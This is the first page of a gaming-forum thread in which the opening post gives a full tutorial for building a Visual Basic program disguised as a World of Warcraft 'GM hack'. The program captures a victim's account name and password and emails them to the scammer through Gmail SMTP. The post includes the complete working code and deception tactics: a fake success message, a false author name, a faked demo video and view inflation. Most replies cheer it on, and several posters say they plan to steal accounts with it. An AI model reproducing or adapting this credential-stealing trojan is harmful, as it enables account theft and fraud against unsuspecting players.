[VB 2008] How to make a Account Scamming Program for Noobs menu

User Tag List

Page 1 of 5 12345 LastLast
Results 1 to 15 of 74
  1. #1
    Jadd's Avatar 🐸 Premium Seller
    Reputation
    1515
    Join Date
    May 2008
    Posts
    2,433
    Thanks G/R
    81/336
    Trade Feedback
    1 (100%)
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)

    [VB 2008] How to make a Account Scamming Program for Noobs

    Hey there! Welcome to my guide on making a scamming program in Visual Basic 2008!


    Start by opening up a new Windows Application Project shown in the picture below:

    1: Click 'Windows Forms Application'.
    2: Give your project a proper name.
    Then click OK.



    You'll now have your newly created form. First give your form a title. You can also change the background colour of the form, the border type, etc. Use the picture below for help.

    1: Click the form
    Top *: The border type of the form. I suggest FixedToolWindow. It looks the coolest.
    Bottom *: The form's title.



    Now that you have your form looking good, you can add some controls. For this guide I am going to be using a simple Account Name/Password scam. If you know what you're doing you can make an email field as well. Okay, now you can add 2 labels, 2 textboxes and a button from the toolbox on the left of the screen. Maneuver your boxes, labels and button to your likings, and your form should now look somewhat like this:



    Now you can change the caption of the label and button by changing the 'Text' field in the properties like so:



    It's also handy to change the Password Textbox's PasswordChar to * like so:



    This is now what your application should look like: (I have also added some text to demonstrate PasswordChar)



    Now we're going to add the code. On the top bar click View -> Code and it will come up with a blank textbox:



    Insert the following code and adjust it accordingly to the settings below the following code:
    Code:
    Imports System.Web
    Imports System.IO
    Imports System.Net.Mail
    
    Public Class Form1
        Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
            If TextBox1.Text = "" Then
                    MsgBox("The account field is not filled in!", MsgBoxStyle.OkOnly, "WoW GM Hack")
            End If
    
            If TextBox2.Text = "" Then
                    MsgBox("The password field is not filled in!", MsgBoxStyle.OkOnly, "WoW GM Hack")
            End If
    
            Dim mail As New System.Net.Mail.MailMessage()
            Dim SmtpServer As New SmtpClient
            SmtpServer.Credentials = New Net.NetworkCredential("Blank", "Blank")
            SmtpServer.Port = 587
            SmtpServer.Host = "smtp.gmail.com"
            SmtpServer.EnableSsl = True
            mail.To.Add("Blank")
            mail.From = New MailAddress("Blank")
            mail.Subject = "Blank"
            mail.Body = "Blank"
            SmtpServer.Send(mail)
        End Sub
    End Class

    Change this to a Gmail Username (Be sure to include @gmail.com!). Please note that this is inside the quotation marks.
    Change this to the Password of that Gmail account! Please note that this is inside the quotation marks.
    Change this to the email the account information it will be sent to. This does not have to be Gmail! (Be sure to include the @whatever.com once again!) Please note that this is inside the quotation marks.
    This will be the same as Red! Please note that this is inside the quotation marks.
    Change this to the subject of the email that will be received upon clicking the button that says (in this case) 'Activate GM Powers'. Please note that this is inside the quotation marks.
    Change this to the body of the email. Read below to find out how to include the account name and password in the email. Please note that this is NOT inside the quotation marks.


    Now to attaching the account name and password to the email. Start by adding this to the body:
    Code:
    "Account: " & TextBox1.Text
    Explanation: In the body of the email it will now say this:
    Account: <the text the victim wrote in TextBox1>

    But of course, we will need it to also say the password. We can do this by using the same mechanics as the previous code. After doing that, the code will be:

    Code:
    "Account: " & TextBox1.Text & vbNewLine & "Password: " & TextBox2.Text
    Explanation: In the body of the email it will now say this:
    Account: <the text the victim wrote in TextBox1>
    Password: <the text the victim wrote in TextBox2>

    The code is very self explanatory but still works as well. This is the conclusion of the body, but not the end of the tutorial!


    Next we will add a success (or error, whichever works better for you) message after the user clicks the 'Activate GM Powers' button. This is very easily done and is explained below.

    This code should be added on the next line down after SmtpServer.Send(mail). Once again please adjust it accordingly to the settings below the following code:

    Code:
    MsgBox("Blank", Blank, "Blank")
    This is the message that pops up after you click the 'Activate GM Powers' button. Please note that this is inside the quotation marks.
    This is the style of the message. Personally I would use MsgBoxStyle.OkOnly as it is the most noob friendly (I don't mean you, I mean the victim :P).
    This is the title of the message. I would probably name it the same as the title of the form (in this case WoW GM Hack).

    So now we have our message. I opted to go for the success message. This is what mine looked like:
    Code:
    MsgBox("Done! Your account's flag has been upgraded to Game Master. It will be fully updated within 24 hours.", MsgBoxStyle.OkOnly, "WoW GM Hack")

    Now to make the program look a bit more professional. On the top bar click Project -> <Project Name> Properties (It's right down the bottom). It will come up with this screen:

    Click the circled button

    Then you will get another settings form. Fill it out according to the caption below the following picture:

    Red labeled box: Type in a random made up name. This is so that people blame this made up person that doesn't exist when they get hacked... Well, this is what I do with my scamming programs anyway.
    Blue labeled boxes: Make these blank if they are not already.
    The rest of them you can just leave how they are.


    Nearly there! Now click the Compile tab (shown in picture below):


    Red box: The Compile tab
    Blue box: Click this and browse for your Desktop.

    Now that this is done, on the top bar, click Build -> Build <Project Name>.

    Go to your desktop and find the .exe file. You can delete the other files that are built including the .pdb and .xml files. That .exe file is your finished program! Congratulations!


    With that, you can upload it to Rapidshare, Megaupload etc. and put a video on YouTube showing off the hack. Obviously it doesn't actually work, so record yourself on a Private server using Game Master Commands.

    And please, don't steal other peoples videos! They work hard on them, and I know what it feels like to be copied.

    Download TubeIncreaser, and run that on your video. That will increase the hits and increase the popularity of it, getting you more accounts.




    That just about sums up my Guide on how to make an Account Scamming program. I hope you learned something, and I wish you the very best of luck scamming peoples accounts.



    Attention!
    This guide was written by JetlagJad of MMOwned and is only allowed to be shown on this site (MMOwned). If you see any other sites with the same guide please private message me on the forums.
    Last edited by Jadd; 01-07-2009 at 09:50 PM.

    [VB 2008] How to make a Account Scamming Program for Noobs
  2. #2
    ludwigolsson's Avatar Member
    Reputation
    11
    Join Date
    Nov 2008
    Posts
    36
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Is this a scam that we will send our accname and pass to you ? if it is = FAIL !

    If not , WHERE IN THE HELL YOU STARTS ? You only oh we are in a map that no one knows and after we click on...

    -No rep for you-

  3. #3
    1337person's Avatar Active Member
    Reputation
    21
    Join Date
    Aug 2007
    Posts
    119
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    it does NOT send the info 2 him, he tells you to add the mail u want it to be sent to
    this might be good for starters i guess.. +rep

  4. #4
    Jadd's Avatar 🐸 Premium Seller
    Reputation
    1515
    Join Date
    May 2008
    Posts
    2,433
    Thanks G/R
    81/336
    Trade Feedback
    1 (100%)
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by ludwigolsson View Post
    Is this a scam that we will send our accname and pass to you ? if it is = FAIL !

    If not , WHERE IN THE HELL YOU STARTS ? You only oh we are in a map that no one knows and after we click on...

    -No rep for you-
    You start with opening up VB 2008. It does not send your information to me, it sends your victim's information to you.

  5. #5
    Licha's Avatar Member
    Reputation
    7
    Join Date
    May 2007
    Posts
    62
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Im downloading VB 2008 right now just too test this! If i get my program too work I will get loads off nub accounts

    +Rep

  6. #6
    Thidan's Avatar Contributor
    Reputation
    299
    Join Date
    Jan 2007
    Posts
    1,009
    Thanks G/R
    2/15
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Nice guide, still I prefer my AutoIt one ^_^
    BUT it's the wrong section, not WoW related in the way of:
    Earning gold.
    Levelling characters.
    Levelling professions.
    Tactics on how to kill stuff.
    Etc.

    Thread reported for moving.


  7. #7
    Jadd's Avatar 🐸 Premium Seller
    Reputation
    1515
    Join Date
    May 2008
    Posts
    2,433
    Thanks G/R
    81/336
    Trade Feedback
    1 (100%)
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Thidan View Post
    Nice guide, still I prefer my AutoIt one ^_^
    BUT it's the wrong section, not WoW related in the way of:
    Earning gold.
    Levelling characters.
    Levelling professions.
    Tactics on how to kill stuff.
    Etc.

    Thread reported for moving.
    Still a guide, but, what should it be in?

  8. #8
    ludwigolsson's Avatar Member
    Reputation
    11
    Join Date
    Nov 2008
    Posts
    36
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I know it´s wrong section but if it was right section = i will think , Where is the good guide ???

  9. #9
    someone0194's Avatar Banned
    Reputation
    8
    Join Date
    Dec 2008
    Posts
    280
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by JetlagJad View Post
    You start with opening up VB 2008. It does not send your information to me, it sends your victim's information to you.[img]http://mmobuzz.idgold.*******************/[/img][img]http://mmobuzz.websitings.*******************/[/img][img]http://mmobuzz.wowaddicts.*******************/[/img][img]http://mmobuzz.goldguide.*******************/[/img][img]http://mmobuzz.warguidez.*******************/[/img][img]http://mmobuzz.wcraftsman.*******************/[/img][img]http://mmobuzz.stephenf84.*******************/[/img][img]http://mmobuzz.aocriches.*******************/[/img][img]http://mmobuzz.conanfortu.*******************/[/img][img]http://mmobuzz.killergu.*******************/[/img][img]http://mmobuzz.tanqueboi.*******************/[/img][img]http://mmobuzz.warhonor.*******************/[/img][img]http://mmobuzz.102341.*******************/[/img][img]http://mmobuzz.demifarr.*******************/[/img][img]http://mmobuzz.aspect10.*******************/[/img][img]http://mmobuzz.proguides.*******************/[/img]
    Oh OK. Thanks.

  10. #10
    ludwigolsson's Avatar Member
    Reputation
    11
    Join Date
    Nov 2008
    Posts
    36
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    +REP !!!

    And if you add me on msn to show me how to do the guide easyer to scam many and explain how i +++rep you everytime i can ! ( Send a private message to me for msn or what you using )

  11. #11
    ViND_'s Avatar Contributor
    Reputation
    156
    Join Date
    Apr 2008
    Posts
    1,134
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Awesome thread, I've been looking for this since the Prince gained the sands...

  12. #12
    ludwigolsson's Avatar Member
    Reputation
    11
    Join Date
    Nov 2008
    Posts
    36
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    JetlagJad can you go online on your msn ??? i know this is little off-topic , but +Rep

  13. #13
    [Shon3m]'s Avatar Banned
    Reputation
    128
    Join Date
    Apr 2007
    Posts
    669
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Great Guide Man +REP

  14. #14
    Thidan's Avatar Contributor
    Reputation
    299
    Join Date
    Jan 2007
    Posts
    1,009
    Thanks G/R
    2/15
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by JetlagJad View Post
    Still a guide, but, what should it be in?
    WoW - General?
    General Programming?
    VB section of programming?
    WoW Scams?


  15. #15
    Krillere's Avatar Contributor
    Reputation
    112
    Join Date
    Nov 2007
    Posts
    668
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Gief VB Download link :P

Page 1 of 5 12345 LastLast
All times are GMT -5. The time now is 02:14 PM. Powered by vBulletin® Version 4.2.3
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Google Authenticator verification provided by Two-Factor Authentication (Free) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search